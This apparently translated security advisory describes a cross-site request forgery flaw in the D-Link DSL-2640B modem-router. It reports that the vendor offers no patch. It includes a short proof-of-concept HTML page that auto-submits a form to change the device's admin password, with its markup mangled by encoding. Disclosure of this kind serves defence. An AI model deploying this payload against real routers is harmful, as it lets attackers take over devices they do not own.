Release date:
Updated on:
Affected Systems:
D-Link DSL-2640B
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52096
D-Link DSL-2640B is a versatile product that integrates modem and router.
The D-Link DSL-2640B has a Cross-Site Request Forgery vulnerability that allows attackers to run privileged commands on affected devices to change configurations, cause denial of service, or inject arbitrary script code.
<* Source: Ivano Binetti
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
& Lt; html & gt;
& Lt; body onload = "javascript: document. forms [0]. submit ()" & gt;
& Lt; H2 & gt; CSRF Exploit to change ADMIN password & lt;/H2 & gt;
& Lt; form method = "POST" name = "form0" action = "http://www.example.com: 80/redpass. cgi? SysPassword = new_password & amp; change = 1 "& gt;
& Lt;/form & gt;
& Lt;/body & gt;
& Lt;/html & gt;
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.dlink.com/